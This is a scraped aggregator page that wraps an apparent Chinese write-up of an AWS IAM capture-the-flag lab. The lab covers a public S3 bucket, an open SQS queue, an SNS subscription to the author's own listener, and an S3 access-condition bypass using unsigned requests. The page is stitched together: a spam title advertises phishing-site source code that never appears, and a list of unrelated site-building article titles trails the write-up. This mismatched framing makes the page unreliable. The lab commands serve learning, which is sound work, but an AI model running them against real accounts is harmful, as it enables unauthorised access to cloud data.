当前位置: 首页 > news >正文

最新钓鱼网站源码app开发制作公司排行榜

最新钓鱼网站源码,app开发制作公司排行榜,wordpress 谷歌搜索结果,深圳做网站的公司aws靶场 在AWS靶场中#xff0c;存在三个安全问题#xff1a;1) 一个S3存储桶政策配置错误#xff0c;允许公共访问#xff0c;通过访问特定域名可获取flag。2) SQS消息队列的政策没有限制角色#xff0c;允许发送和接收消息#xff0c;通过aws sqs命令行工具的receive-…aws靶场 在AWS靶场中存在三个安全问题1) 一个S3存储桶政策配置错误允许公共访问通过访问特定域名可获取flag。2) SQS消息队列的政策没有限制角色允许发送和接收消息通过aws sqs命令行工具的receive-message接口最终找到flag。3) SNS主题订阅政策过于开放允许任意Endpoint订阅使用HTTP协议订阅并结合AWS CLI的sns confirm-subscription命令获取完整响应从而得到flag。最后一个挑战涉及存储桶的IAM策略通过aws s3api命令的list-objects接口利用无签名请求绕过权限限制访问flag。 存储桶泄露 查看第一个policy给出了这个问题可以允许列出桶的权限注意看Principal 这里没有限制具体的访问角色这里的*代表互联网所有人都可以访问的意思公开桶。 使用s3的命令行其实可以获取到可以通过其他命令复制出来aws好像是没办法直接查看内容的 想直接查看内容的话可以直接把resource提供的域名直接拼接到aws的域名上amazonaws.com 见此flag已经出来了可以下一关 SQS消息队列 查看第二个的policy如箭头所示没有限制具体的角色而且允许sqs进行发消息和接收消息 通过阅读官方文章sqs这块有这么多个接口可以搞但是注意这块我们的权限只有send和receive https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message.html 根据文档上的构造那么应该是把092297851374 和 wiz-tbic-analytics-sqs-queue-ca7a1b2进行拼接 aws sqs send-message --queue-url https://sqs.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 构造好的请求直接发包发现抱错了 还需要–message-body那继续添加随便加上111但是返回来的json没有flag值。那么只能从rece接收信息的参数入手了 继续查看官网文档receive-message构造例子如下有的参数是不必须的得在测试中得到真理 构造后进行请求获得的响应内容多了有个很明显的链接访问就是flag了。 aws sqs receive-message --queue-url https://sqs.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 SNS托管式消息传递服务 SNS和SQS的区别 SNS SNS 是一种发布/订阅模型其中消息发布到一个主题Topic然后所有订阅了该主题的终端如应用程序、服务、端点等都会接收到相同的消息。主题允许多个订阅者并支持广播和多播。SQS SQS 是一种队列模型其中消息被发送到队列然后由队列的消费者订阅者按照顺序处理。每条消息只能由一个消费者接收确保消息按照顺序处理。 了解了sns的基本含义之后我们来看题目给的policy Action: 定义允许执行的操作这里是 “SNS:Subscribe”表示允许订阅 SNS 主题。Resource: 定义操作作用的资源这里是 “arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications”表示允许对指定 SNS 主题执行订阅操作。Condition: 是一个可选的部分定义允许或拒绝操作的条件。在这里使用了 “StringLike” 条件要求 “sns:Endpoint” 的值符合 “*tbic.wiz.io” 这个模式。 还是老样子我们查看官方的文档 那么其实sns里面有protocol参数可以指定http请求 那么subscribe权限下获取http订阅消息的cli参数命令示例如下 aws sns subscribe --topic-arn arn:aws:sns:us-east-1:123456789012:MyTopic \--protocol http \--notification-endpoint http://example.com/endpoint把题目给的参数带上发送请求 aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \--protocol http \--notification-endpoint http://xxx:8089/tbic.wiz.io对应自己的服务器起了http服务但是虽然能获取到响应但是没办法获取更多的响应信息 琢磨了一段时间发现用tcp起端口nc就可以获取所有响应信息了。但是这段信息里面是没有flag的 但是给过来的响应已经提示了To confirm the subscription, visit the SubscribeURL included in this message 那么查阅文档后才知道确认消息的具体格式也可以使用 aws sns confirm-subscription 命令来手动确认订阅提供确认消息中的 Token aws sns confirm-subscription --topic-arn YOUR-TOPIC-ARN --token YOUR-SUBSCRIPTION-TOKENaws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 2336412f37fb687f5d51e6e2425c464ced460311901b18ad7c9bd3425561759e0bc3078a08b110692b8d11f962a2f83a2a0ff5067a20d9fc029a1d03eae63ce14c57cad0caeeabdf819036410bcf82b8fb95b2d2191762491329cae004ef65d7018b0c08e0a59abfff27ddabd67bd391c0f3c9fe7f6b172bac94f2f7c5eab424 虽然爆红了说权限不够但是还是可以收到sns发过来订阅的消息 在nc这边监听获取到的message就是flag了 存储桶错误配置 在下面的policy可以知道存储桶thebigiamchallenge-admin-storage-abf1321允许的操作是GetObject和ListBucket但是ForAllValues:StringLike这块只允许arn:aws:iam::133713371337:user/admin 才能访问 这块其实想了很久一直没有办法突破。因为没有办法绕过PrincipalArn的限制最后是查阅官网文档如果请求中没有上下文键或者上下文键值解析为空数据集如空字符串则也会返回 true https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html 那么让上下文键值为空的话查阅s3api的文档可以带上–no-sign-request 发送请求我们可以获取到flag了 aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --pre fix files/ --no-sign-request关于存储桶这块我得记录一下 aws s3和aws s3api的区别 应该就是s3用的ak sks3api用的是sts token 记录的链接 aws相关链接 https://rzepsky.medium.com/aws-and-hackerone-ctf-write-up-4c37131f7cbb https://www.hackthebox.com/blog/aws-pentesting-guide#common_aws_penetration_testing_techniques_within_an_attack_path https://mystic0x1.github.io/posts/AWS-Privilege-Escalation-Part-01/ https://mystic0x1.github.io/posts/AWS-Privilege-Escalation-Part-02/ https://github.com/BishopFox/iam-vulnerable https://github.com/andresriancho/enumerate-iam https://github.com/ine-labs/AWSGoat 靶场 https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/ 外国佬的知识 https://mp.weixin.qq.com/s/j8PNLwDAyoSidtuNWnYsMQ 利用AWS Lambda函数漏洞实现初始访问 下载对应的cli工具 https://aws.amazon.com/cn/cli/ /.aws/credentials AWS漏洞利用框架Pacu https://www.freebuf.com/sectool/190074.html aws ssrfcicd流程 rce 值得回味 https://zone.huoxian.cn/d/1303-aws-elastic-beanstalk-ssrfrce aws 攻击笔记大全 https://wiki.teamssix.com/CloudService/IAM/ aws中的iam是什么 其他
http://www.pierceye.com/news/221053/

相关文章:

  • html5 网站布局应用教程韩雪冬 网站
  • 行业网站维护印刷公司网站模板
  • 做自媒体需要用的网站wordpress更换语言包
  • 电子书推送网站怎么做重庆产品网站推广
  • 免费做课设的网站织梦本地安装网站
  • 龙岗做网站公司szaow品牌网站建设公司哪好
  • 设计网站项目描述怎么样下载网页上的视频
  • 比较开放的浏览器清远网站seo
  • 个人网站的域名注册怎么做手机app软件开发
  • 卡盟网站开发google play三件套
  • 缠绕机东莞网站建设技术支持在线协同办公软件
  • 邵阳做网站哪个公司好接推广网站
  • 媒体网站模版网站添加提醒
  • 平度网站建设公司电话制作动画网站模板
  • 教育手机网站开发郑州网站修改建设
  • 查询网站入口长春网站排名推广
  • 中国建设工程造价网站丰润网站建设
  • 电子项目外包网站可以发描文本的网站
  • 论文中引用网站中wordpress外汇行情
  • 宁城网站建设磁力宝
  • 找人做彩票网站多少钱茶叶网站flash模板
  • 海口制作网站企业深圳网站建设seo推广优化
  • 东莞建设质监网站建设网站方式有哪些
  • 中学网站建设书最好的网站设计开发公司
  • 下载网站源码聊城seo培训
  • 专用于做网站公司推广的方式有哪些
  • 网站如何规划c 手机网站开发模板
  • 哈尔滨网站建设优化公司室内设计网站
  • 厚街做网站的公司wordpress出现百度抓取404页面
  • 四川南充网站建设西安网站建设推广优化